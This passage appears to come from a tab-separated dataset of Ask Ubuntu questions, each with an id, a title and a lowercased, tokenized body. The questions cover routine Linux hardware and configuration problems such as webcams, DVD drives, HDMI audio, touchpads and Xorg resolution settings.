both be included ... yes checking whether struct tm is in sys/time.h or time.h ... time.h checking for working volatile ... yes checking whether lstat correctly handles trailing slash ... yes checking whether lstat accepts an empty string ... no checking whether lstat correctly handles trailing slash ... ( cached ) yes checking for working memcmp ... yes checking whether stat accepts an empty string ... no checking for strftime ... yes checking for memset ... yes checking for sqrt ... no checking for strcasecmp ... yes checking for strerror ... yes checking for strncasecmp ... yes checking for strstr ... yes checking for fdatasync ... yes checking for ftruncate ... yes checking for getcwd ... yes checking for gettimeofday ... yes checking for localtime_r ... yes checking for memmove ... yes checking for strerror ... ( cached ) yes checking for sqlite3_prepare_v2 in -lsqlite3 ... yes checking for sqlite3_rtree_geometry_callback in -lsqlite3 ... yes checking proj_api.h usability ... no checking proj_api.h presence ... no checking for proj_api.h ... no configure : error : can not find proj_api.h , bailing out
190608	how do i restore the yaboot bootloader screen after os x install ?	i had to reinstall os x tiger to the first partition , but reinstalling it modified my boot loader and i no longer had access to the yaboot choice menu .
190610	ca n't capture video from usb-webcam with ffmpeg	i have a hama usb webcam which works fine with the fswebcam command to capture single frames but when i try to capture a video with ffmpeg i get an error : sudo ffmpeg -f video4linux2 -i /dev/video0 myvid.mpg ffmpeg version 0.11.1 copyright ( c ) 2000-2012 the ffmpeg developers built on sep 16 2012 19:54:21 with gcc 4.6.3 configuration : libavutil 51 . 54.100 / 51 . 54.100 libavcodec 54 . 23.100 / 54 . 23.100 libavformat 54 . 6.100 / 54 . 6.100 libavdevice 54 . 0.100 / 54 . 0.100 libavfilter 2 . 77.100 / 2 . 77.100 libswscale 2 . 1.100 / 2 . 1.100 libswresample 0 . 15.100 / 0 . 15.100 [ video4linux2 , v4l2 @ 0x11f0440 ] buffer len [ 0 ] = 12288 ! = 19200 /dev/video0 : operation not permitted the command usb-devices gives : t : bus=01 lev=02 prnt=02 port=02 cnt=02 dev # = 4 spd=12 mxch= 0 d : ver= 1.10 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=0c45 prodid=6142 rev=01.01 s : product=usb camera c : # ifs= 1 cfg # = 1 atr=80 mxpwr=500ma i : if # = 0 alt= 0 # eps= 3 cls=ff ( vend . ) sub=ff prot=ff driver=sonixj and the v4l2-ctl gives : v4l2-ctl -- all driver info ( not using libv4l2 ) : driver name : sonixj card type : usb camera bus info : usb-bcm2708_usb-1.3 driver version : 3.2.27 capabilities : 0x05000001 video capture read/write streaming format video capture : width/height : 640/480 pixel format : 'jpeg' field : none bytes per line : 640 size image : 230990 colorspace : jpeg ( jfif/itu601 ) jpeg compression : quality : 90 markers : 0x00000018 define huffman tables define quantization tables video input : 0 ( sonixj : ok ) streaming parameters video capture : frames per second : invalid ( 0/0 ) read buffers : 2
190612	how to install erlang in ubuntu 12.04 ?	just as the title says , how do i install erlang in my ubuntu 12.04 ?
190615	how to show the ubuntu launcher under parallels	i installed ubuntu 12.04.1 lts on my mac using parallels , can you tell me how to display the launcher inside ubuntu ? i am also having problems with the menubar as it appears to be invisible . my system information : macbook pro ( 15-inch core 2 duo ) - model : late 2006 â used laptop ram : 3gb ( seems 4gb ) 130gb hdd 10gb for ubuntu , 512mb ram for ubuntu see http : //forum.parallels.com/showthread.php ? p=640653 # post640653
190618	what happens when you change the name of a file or folder that is synced to ubuntu one ?	i 've been using ubuntu one for the last year or two to sync/backup specific important files and folders on my computer . rather than just using it like `` dropbox '' ( i.e. , putting files i want to sync in the specific `` ubuntu one '' folder ) , i am taking advantage of the total integration of ubuntu one to sync the folders as they exist in my file tree . recently , i decided that i needed to better organize that filetree ( i 'm a professor and a researcher , so i accrue a lot of files ) , including renaming and reorganizing many of the files/folders that i 've been syncing to ubuntu one . my question is this : what happens to the `` old '' versions of all these renamed files/folders up in the cloud ? i know ubuntu one keeps versioned editions of each file , and only keeps the changed parts in order to save space . but if i renamed the folder , and then re-synced it , i 'm assuming that a brand new file is created , which is a complete duplicate of the old file . i checked the `` cloud folders '' tab in the ubuntu one preferences dialog , and it does appear that every single one of my `` old '' fodlers/files is still there , but not actively being synced any more . am i right to assume that these are taking up extra space in my ubuntu one account ? that these are , in fact , full duplicates of the `` new '' files ? my main question here is : can i safely delete these once the `` new '' organization of my file tree has completely synced ? i realize that i will loose the versioning saved by ubuntu one in these `` old '' files , but i am sure that i do n't need that info anymore ( everything is exactly up to date ) . if this is okay , how , exactly can i remove these old versions ? there does not seem to be a way to `` delete '' them from the ubuntu one preferences dialog . thanks in advance ...
190619	keyboard shortcut to lock screen stops working	i 've set the keyboard shortcut super+l to lock my screen . several times i 've tried to lock the screen and it just pulls up the super menu . when i go back and check the keyboard shortcut it is still set and listed as super+l . resetting the shortcut to super+l restores functionality for a time . i ca n't tell what 's triggering this failure . any input would be appreciated !
190624	wubi install resulted in error	i just did the wubi install , and when i rebooted it game me an error code telling me i needed to insert the system disk . i am using win 7 on an asus laptop . i 've got the wubi installed on it 's own separate section of my 1tb hard drive , so space is n't a problem . error code it gives me is : status : 0xc0000098 ; mbr missing or corrupt . it then went to tell me where it exists , and i just finished checking and the mbr is there . do i need to re-install ?
190628	setting different keypress rate for individual keys ?	i 'd like an especially high repeat rate and low delay on my backspace key , but a regular delay and rate on every other key . this command works , but sets it for every key : xset r rate 120 30 is there a way to have different settings for individual keys ?
190629	dvd not detected ?	as i insert a dvd in my drive ( on a laptop ) using kubuntu 12.04 , the dvd is not detected . the drive takes the dvd , i can hear it munching on it for a while , and then nothing . even ejecting the dvd becomes a hassle , i need to do that at boot time otherwise the os wo n't allow me to eject . kubuntu 12.04 used to read and mount the same dvds just fine a week ago . edit : since i am able to boot from cd , can i safely assume the issue is not a hardware issue ? how can i fix this ? wodim -- devices returns : wodim : overview of accessible drives ( 1 found ) : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 0 dev='/dev/sg1 ' rwrw -- : 'optiarc ' 'dvd+-rw ad-7640a' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - sudo lshw -class disk returns : *-cdrom description : dvd-ram writer product : dvd+-rw ad-7640a vendor : optiarc physical id : 0.0.0 bus info : scsi @ 3:0.0.0 logical name : /dev/cdrom2 logical name : /dev/cdrw2 logical name : /dev/dvd2 logical name : /dev/dvdrw2 logical name : /dev/sr0 version : jd06 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=open lspci returns : 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 0c ) 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) ( rev 0c ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 2 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 4 ( rev 03 ) 00:1c.4 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 5 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev f3 ) 00:1f.0 isa bridge : intel corporation 82801hm ( ich8m ) lpc interface controller ( rev 03 ) 00:1f.1 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 03 ) 06:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 02 ) 08:05.0 firewire ( ieee 1394 ) : o2 micro , inc. firewire ( ieee 1394 ) ( rev 02 ) 08:05.2 sd host controller : o2 micro , inc . integrated mmc/sd controller ( rev 02 ) 08:05.3 mass storage controller : o2 micro , inc . integrated ms/xd controller ( rev 01 ) and lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 0c45:63e0 microdia sonix integrated webcam bus 003 device 002 : id 0483:2016 sgs thomson microelectronics fingerprint reader the /etc/modprobe.d/blacklist.conf contains : # this file lists those modules which we do n't want to be loaded by # alias expansion , usually so some other driver will be loaded for the # device instead . # evbug is a debug tool that should be loaded explicitly blacklist evbug # these drivers are very simple , the hid drivers are usually preferred blacklist usbmouse blacklist usbkbd # replaced by e100 blacklist eepro100 # replaced by tulip blacklist de4x5 # causes no end of confusion by creating unexpected network interfaces blacklist eth1394 # snd_intel8x0m can interfere with snd_intel8x0 , does n't seem to support much # hardware on its own ( ubuntu bug # 2011 , # 6810 ) blacklist snd_intel8x0m # conflicts with dvb driver ( which is better for handling this device ) blacklist snd_aw2 # causes failure to suspend on hp compaq nc6000 ( ubuntu : # 10306 ) blacklist i2c_i801 # replaced by p54pci blacklist prism54 # replaced by b43 and ssb . blacklist bcm43xx # most apps now use garmin usb driver directly ( ubuntu : # 114565 ) blacklist garmin_gps # replaced by asus-laptop ( ubuntu : # 184721 ) blacklist asus_acpi # low-quality , just noise when being used for sound playback , causes # hangs at desktop session start ( ubuntu : # 246969 ) blacklist snd_pcsp # ugly and loud noise , getting on everyone 's nerves ; this should be done by a # nice pulseaudio bing ( ubuntu : # 77010 ) blacklist pcspkr # edac driver for amd76x clashes with the agp driver preventing the aperture # from being initialised ( ubuntu : # 297750 ) . blacklist so that the driver # continues to build and is installable for the few cases where its # really needed . blacklist amd76x_edac
190631	disabling control-alt-delete shutdown is not working	i 'm running ubuntu 10.04 in a virtual machine on a windows 7 computer . if i press ctrl-alt-delete when the ubuntu vm is in focus , the ubuntu system sees it and shuts down after 60 seconds . this does not happen if the ubuntu vm is not in focus . i know i could just `` be careful '' , but i 'd like to avoid accidentally shutting down my ubuntu system every time i lock my machine . i found the following directions for disabling this behavior on ubuntu : to disable ctrl+alt+del reboot edit # sudo nano /etc/init/control-alt-delete.conf comment out : # start on control-alt-delete # task # exec shutdown -r now âcontrol-alt-delete pressedâ i tried that , but it 's not working ( even after rebooting the system ) . considering how common this answer appeared to be , i 'm a bit confused . any other ways to disable this behavior ? thanks !
190639	how to preserve/export my current ubuntu installation after changing to a new ssd & installing windows7 ?	ok , currently got set up : puny little old 40gb harddrive amd athlon ii x2 245 4gb ddr3 ram planning to upgrade to : 120gb ssd harddrive ( 40gb is getting a little tight for me , but 120gb is plenty for my purposes and the speed boost would be nice ) amd athlon ii x2 245 4gb ddr3 ram radeon hd7770 1gb ddr5 ( going to start doing a bit of light gaming , is the only reason i use windows at all ! ) my question is how can i install windows7 then ubuntu on my new sdd and still preserve my settings/data i 've currently got in ubuntu ? such as the applications i 've got installed already , files , passwords & bookmarks saved in various browsers , settings , etc ( i do n't care in the slightest however about what is currently on my windows xp installation ! ) edit : forgot to mention an important point , that i would have to reinstalled ubuntu as originally i just installed it using a random ubuntu live cd 10.04 32 bit lts that i had at hand ( and since upgraded to 12.04 32 bit lts via the automatic update ) but i would like to change to 12.04 64 bit lts instead ( just downloaded it last night , and i 'll burn it to a dvd this evening ) .
190642	no sound via hdmi . intel 82801h , ubuntu 12.04	i have just reinstalled ubuntu 12.04 64 bits in my laptop . a dell xps m1330 . with previous versions it used to ask me to install additional drivers ( a realtek card , i do n't remember very well ) . but this time it seems not to need it any more . any way sound works ok thru laptop 's speakers but i do n't get it working in my tv via hdmi as it used to work . actually there is no hdmi option in the sound settings . $ aplay -l **** lista de playback dispositivos hardware **** tarjeta 0 : intel [ hda intel ] , dispositivo 0 : stac92xx analog [ stac92xx analog ] subdispositivos : 1/1 subdispositivo # 0 : subdevice # 0 tarjeta 0 : intel [ hda intel ] , dispositivo 1 : stac92xx digital [ stac92xx digital ] subdispositivos : 1/1 subdispositivo # 0 : subdevice # 0 tarjeta 0 : intel [ hda intel ] , dispositivo 3 : hdmi 0 [ hdmi 0 ] subdispositivos : 1/1 subdispositivo # 0 : subdevice # 0 $ lspci | grep `` audio '' # if no hits , change to 'audio ' or remove ' | grep `` audio '' ' 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 02 ) $ sudo lshw -c multimedia [ sudo ] password for keroak : *-multimedia descripción : audio device producto : 82801h ( ich8 family ) hd audio controller fabricante : intel corporation id físico : 1b información del bus : pci @ 0000:00:1b.0 versión : 02 anchura : 64 bits reloj : 33mhz capacidades : pm msi pciexpress bus_master cap_list configuración : driver=snd_hda_intel latency=0 recursos : irq:47 memoria : fe9fc000-fe9fffff $ cat /proc/asound/card0/codec # * | grep codeccodec : sigmatel stac9228 codec : silicon image sii1392 hdmi
190651	xorg becomes unkillable at 3am	most nights , some time in the hour of 3am my xorg process will increase to 100 % cpu and gpu load will also increase to 100 % . the process also becomes unkillable . i can not sudo kill -9 it or get back control with sudo service lightdm restart . i also can not switch to to a tty screen with ctrl + alt + f1 . to reboot i have to log in with ssh , but this is not perfect because if i reboot while it is doing this my zfs pool will fail to mount when it comes back up ( that is where my /home is ) . does anyone have any ideas as to why i ca n't stop and restart xorg , or even better , know why this is happening ? thanks note : for anyone who comes looking for the same problem . i disabled catalyst ai and made it through the night . i 've been up for 1 day 3 hours now . my record for this month is 2 days and 19 hours without a problem . my all time record is 6 days without a crash . i 'll post here if it crashes again or i 'm able to set a new record . update : my computer crashed today at 4:32am . i rebooted at 9:30 and went to a 1 hour lecture , when i came back it had crashed again . i have reverted to the open source drivers for now = (
190653	how to make cuttleflish open chrome when computer connects to the internet	i like to use google chrome ( with the tweetdeck for chrome app ) as my twitter app , and i also watch youtube on it . other then that , i just use firefox for everything else . i just installed cuttleflish , and was wondering how to make google chrome open when my computer connects to the internet ( after startup . ) can someone please help me figure out how to do this ? thanks !
190654	how do i fix an overheating problem with an hp envy-4 ultrabook ?	i have bought a new hp envy-4 ultrabook . it has an i5 processor , pre-installed windows 7 and 2gb radeon graphics card . what happened was when i started using ubuntu it showed overheating . i ignored it but after a few days it burnt my laptop battery to 0 % capacity . it was just one month old so i got the battery replaced for free . i tried installing linux mint but it also showed overheating . i tried fedora 17 but it did n't install correctly . on windows it is running perfectly fine and it 's not even heating a bit . can someone please suggest what the problem with ubuntu is and possible solutions ? i am a computer science guy so i ca n't work without linux and this machine is then like a waste for me .
190660	how do i access the windows spread programmatically ?	i am doing a project in which my application has the ability to spread , similar to effect of pressing super+w . i was wondering how it can be done programmatically , preferably using python . can it be done ? i am doing it on ubuntu and for ubuntu . so anything that ranges from shell script to advanced unity core is welcome !
190671	smart says disk failure is imminent due to bad blocks , what do i need to do ?	i have on my hard drive 2 oses : ubuntu 12.04 and windows vista ( i keep it just because of school ) . everything was ok on both oses , but one day on ubuntu i was getting awkward noises from my notebooks ' hard drive and then everything stopped and i could n't do anything . on windows everything was ok. every time i boot ubuntu i can get 5 minutes normal run time , without problems . after that the hard drive sounds crazy and nothing works . i could run s.m.a.r.t tests from a older ubuntu cd ( 10.04 ) from the gui ( disk utility , or something like that and from terminal ) . from the gui , i got that the disk failure is imminent and i have ~700 bad blocks ( or broken blocks , i had that test i while ago ) on my hdd . from the terminal ( i do n't remember if it was fsck or a smart test command ) i got that the hdd will fail in under 24 hours . since then it passed 2-3 weeks . i 've tried `` badblocks '' but after 10 hours it was still running and i had to stop it . now i have to use cygwin and other alternatives for my linux apps on windows . how can i separate the bad blocks from ubuntu so it would n't use them ? please help .
190682	will ubuntu server work on a pentium 3 ?	can i run ubuntu server on pentium 3 with 386mb of ram , as i need a basic file server to use at home . i have 3 computers and want to share files using a server on ubuntu , but i need to know what the minimum specs for it are .
190689	only 'sdb ' shows up when installing 12.04 on a new dell inspiron 14z	i got my brand new dell inspiron 14z yesterday , but failed to install ubuntu . i can boot from a usb stick , and it works well . when trying to install , i confirm that the laptop is connected to the internet etc ( as in the 2nd picture in the installation guide : how do i install ubuntu ? ) . when pressing `` continue '' i do not get the question on installation type ( alongside/replace/something else ) . instead i get a window where i can select partitions : the problem is that i can only select sdb in the drop drop down box , and i can do do nothing with sdb ( like adding partitions etc ) . the main disk ( sda ) is partitioned using gparted the following way : as far as i understand from other posts on ask ubuntu , this should work . what can i do to install ubuntu alongside with windows 7 ?
190700	help with synclient configuration on an elantech touchpad	i have recently installed ubuntu 12.04 on my brand new asus k55v . the touchpad behaves weird - two finger tap is interpreted as right-click , click and drag is not working ( a double click is needed ) and so on . two finger scrolling ( horizontal & vertical ) works great . i want the touch pad to behave the `` normal '' way ( that is - like in my old laptop ... ) . i read the synclient documentation and many of the questions posted here , and i can even make some stuff work . unfortunately , i could n't figure out how to make these work : click and drag ( that is - physically clicking the button and dragging a finger ) clicking in the right side of the button interpreted as right-click clicking button with two fingers interpreted as middle-click . specs : the touchpad is equipped with a physical button that clicks . here 's the output of xinput list-props `` etps/2 elantech touchpad '' | grep capabilities : synaptics capabilities ( 294 ) : 1 , 0 , 1 , 1 , 1 , 1 , 1 any help will be much appreciated .
190702	launcher tooltip display issues	i 've just installed ubuntu 12.04.1 , and it seems that i have some issues with the launcher : if i hover the mouse on an icon , it shows a horizontal line instead of the icon 's name . if i hover it again , then it will show me the correctly displayed name , in label and all . the thing is pretty annoying . first hover no label ( just that line ) , second hover , label . video drivers are installed . any thoughts ?
190706	how can i use thunderbird local folders in alpine mail client ?	the subject says it all . i would like to either share local mail folders between thunderbird and alpine mail client , or export a set of thunderbird local mail folders that i can import into alpine .
190711	how to connect to other ubuntu machine as x server ?	when i want to work on my local linux machines from windows , i use putty+xming and i set the xming port in putty connection settings . this way i have a terminal on the machine and if , for example , i run the command 'firefox ' a firefox window is opened in windows ( while it is really running on the linux machine ) . i want to do the same thing from other linux machine ( they are both ubuntu machine ) connect by ssh and become this connection x server so any graphic component will be opened on local machine . how can i do that ?
190716	is there an easy way to ( temporarily ) disable the display timeout ?	in kde 3.5 there was the powermanager plugin for the kicker panel , where one could easily switch between different profiles . so normally , i want the display to go to sleep after , say , 10 minutes of user inactivity . but when i watch a video , this should not happen . i know i could go via the kde launcher , settings , powermanager , and change the setting . but this is too complicated for daily use . i also know there are those activities . but i do n't want to change background etc. , just the display timeout . furthermore , when i tried this , many of the open apps simply crashed and got restarted . i simply do n't like this approach . preferably , it would be something to plug-in to the panel , which opens a menu to select the profile -- as it was with kde 3.5 . is there a similar solution i missed ?
190718	how to duplicate a tab in firefox ?	is it possible to clone/duplicate tab in firefox ? basicaly , the other new tab should contain the same history of the tab i 'm trying to clone .
190721	my battery drains really fast and my laptop gets really hot , what do i do ?	i just installed ubuntu on my hp pavilion dv6-6c50ca , and i noticed that every time that i start my laptop with ubuntu the fan runs really fast and the laptop produces a lot of heat . when i run windows on it , the battery life lasts for 4 hours but when i run ubuntu , it barely lasts for an hour and a half no matter what i 'm doing , even when i 'm typing a simple word document . here are my laptop specifications : hd brightview led-backlit display intel core i5 2.5 ghz i5-2450m 750gb hard drive 5400rpm video card : amd radeon hd 7690m xt battery : 6-cell lithium-ion here is a more detailed specification in case i left out anything important . thank you for your help !
190724	ubuntu 12.04 is changing resolution / refresh rate after login	the x11 log below shows a problem : first , the resolution is set to 1920x1080 @ 50p which is great . the login dialog seems to be fine at 1920x1080 @ 50p . after i login , the resolution changes to 1920x1080_60 . the mode 1920x1080_60 is not even defined in my xorg.conf . i only have modeline and mode defined for 1920x1080 @ 50p . i wonder who is setting the other mode 1920x1080_60 ? i already disabled the nvidia-settings startup thing . but this did n't change anything . xorg.conf : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 295.40 ( buildmeister @ swio-display-x86-rhel47-06.nvidia.com ) thu apr 5 22:40:54 pdt 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' option `` exactmodetimingsdvi '' `` true '' modeline `` 1920x1080 @ 50p '' 148.50 1920 2448 2492 2640 1080 1084 1089 1125 +hsync +vsync endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' option `` dynamictwinview '' `` 0 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 # option `` nologo '' `` true '' # option `` dynamictwinview '' `` false '' # option `` noflip '' `` false '' # option `` flatpanelproperties '' `` scaling = native '' subsection `` display '' depth 24 modes `` 1920x1080 @ 50p '' endsubsection endsection # section `` extensions '' # option `` composite '' `` disable '' # endsection xorg.0.log : [ 15.707 ] x.org x server 1.11.3 release date : 2011-12-16 [ 15.707 ] x protocol version 11 , revision 0 [ 15.707 ] build operating system : linux 2.6.42-26-generic x86_64 ubuntu [ 15.707 ] current operating system : linux server 3.2.0-30-generic # 48-ubuntu smp fri aug 24 16:52:48 utc 2012 x86_64 [ 15.707 ] kernel command line : boot_image=/boot/vmlinuz-3.2.0-30-generic root=uuid=26612709-c6f0-49dc-8389-527bd572ab4b ro quiet splash vt.handoff=7 [ 15.707 ] build date : 04 august 2012 01:51:23am [ 15.707 ] xorg-server 2:1.11.4-0ubuntu10.7 ( for technical support please see http : //www.ubuntu.com/support ) [ 15.707 ] current version of pixman : 0.24.4 [ 15.707 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 15.707 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 15.712 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : wed sep 19 23:03:41 2012 [ 15.712 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 15.712 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 15.712 ] ( == ) serverlayout `` layout0 '' [ 15.712 ] ( ** ) | -- > screen `` screen0 '' ( 0 ) [ 15.712 ] ( ** ) | | -- > monitor `` monitor0 '' [ 15.712 ] ( ** ) | | -- > device `` device0 '' [ 15.712 ] ( ** ) | -- > input device `` keyboard0 '' [ 15.712 ] ( ** ) | -- > input device `` mouse0 '' [ 15.712 ] ( == ) automatically adding devices [ 15.712 ] ( == ) automatically enabling devices [ 15.712 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 15.712 ] entry deleted from font path . [ 15.713 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 15.713 ] entry deleted from font path . [ 15.714 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 15.714 ] entry deleted from font path . [ 15.714 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 15.714 ] entry deleted from font path . [ 15.714 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/75dpi/ : unscaled , /usr/share/fonts/x11/type1 , /usr/share/fonts/x11/75dpi , built-ins [ 15.714 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 15.714 ] ( ww ) hotplugging is on , devices using drivers 'kbd ' , 'mouse ' or 'vmmouse ' will be disabled . [ 15.714 ] ( ww ) disabling keyboard0 [ 15.714 ] ( ww ) disabling mouse0 [ 15.714 ] ( ii ) loader magic : 0x7f6b7167eb00 [ 15.714 ] ( ii ) module abi versions : [ 15.714 ] x.org ansi c emulation : 0.4 [ 15.714 ] x.org video driver : 11.0 [ 15.714 ] x.org xinput driver : 16.0 [ 15.714 ] x.org server extension : 6.0 [ 15.715 ] ( -- ) pci : * ( 0:5:0:0 ) 10de:08a4:106b:00c0 rev 162 , mem @ 0xd2000000/16777216 , 0xc0000000/268435456 , 0xd0000000/33554432 , i/o @ 0x00001000/128 , bios @ 0x ? ? ? ? ? ? ? ? /131072 [ 15.717 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 15.717 ] ( ii ) loadmodule : `` extmod '' [ 16.170 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 16.175 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 16.175 ] compiled for 1.11.3 , module version = 1.0.0 [ 16.175 ] module class : x.org server extension [ 16.175 ] abi class : x.org server extension , version 6.0 [ 16.175 ] ( ii ) loading extension mit-screen-saver [ 16.175 ] ( ii ) loading extension xfree86-vidmodeextension [ 16.175 ] ( ii ) loading extension xfree86-dga [ 16.175 ] ( ii ) loading extension dpms [ 16.175 ] ( ii ) loading extension xvideo [ 16.175 ] ( ii ) loading extension xvideo-motioncompensation [ 16.175 ] ( ii ) loading extension x-resource [ 16.175 ] ( ii ) loadmodule : `` dbe '' [ 16.175 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 16.175 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 16.175 ] compiled for 1.11.3 , module version = 1.0.0 [ 16.175 ] module class : x.org server extension [ 16.175 ] abi class : x.org server extension , version 6.0 [ 16.175 ] ( ii ) loading extension double-buffer [ 16.175 ] ( ii ) loadmodule : `` glx '' [ 16.175 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/libglx.so [ 16.188 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 16.188 ] compiled for 4.0.2 , module version = 1.0.0 [ 16.188 ] module class : x.org server extension [ 16.188 ] ( ii ) nvidia glx module 295.40 thu apr 5 21:57:38 pdt 2012 [ 16.188 ] ( ii ) loading extension glx [ 16.188 ] ( ii ) loadmodule : `` record '' [ 16.189 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 16.189 ] ( ii ) module record : vendor= '' x.org foundation '' [ 16.189 ] compiled for 1.11.3 , module version = 1.13.0 [ 16.189 ] module class : x.org server extension [ 16.189 ] abi class : x.org server extension , version 6.0 [ 16.189 ] ( ii ) loading extension record [ 16.189 ] ( ii ) loadmodule : `` dri '' [ 16.189 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 16.189 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 16.189 ] compiled for 1.11.3 , module version = 1.0.0 [ 16.189 ] abi class : x.org server extension , version 6.0 [ 16.189 ] ( ii ) loading extension xfree86-dri [ 16.189 ] ( ii ) loadmodule : `` dri2 '' [ 16.189 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 16.190 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 16.190 ] compiled for 1.11.3 , module version = 1.2.0 [ 16.190 ] abi class : x.org server extension , version 6.0 [ 16.190 ] ( ii ) loading extension dri2 [ 16.190 ] ( ii ) loadmodule : `` nvidia '' [ 16.190 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 16.190 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 16.190 ] compiled for 4.0.2 , module version = 1.0.0 [ 16.190 ] module class : x.org video driver [ 16.190 ] ( ii ) nvidia dlloader x driver 295.40 thu apr 5 21:38:35 pdt 2012 [ 16.190 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 16.190 ] ( ++ ) using vt number 7 [ 16.190 ] ( ii ) loading sub module `` fb '' [ 16.190 ] ( ii ) loadmodule : `` fb '' [ 16.191 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 16.191 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 16.191 ] compiled for 1.11.3 , module version = 1.0.0 [ 16.191 ] abi class : x.org ansi c emulation , version 0.4 [ 16.191 ] ( ii ) loading sub module `` wfb '' [ 16.191 ] ( ii ) loadmodule : `` wfb '' [ 16.191 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 16.191 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 16.191 ] compiled for 1.11.3 , module version = 1.0.0 [ 16.191 ] abi class : x.org ansi c emulation , version 0.4 [ 16.191 ] ( ii ) loading sub module `` 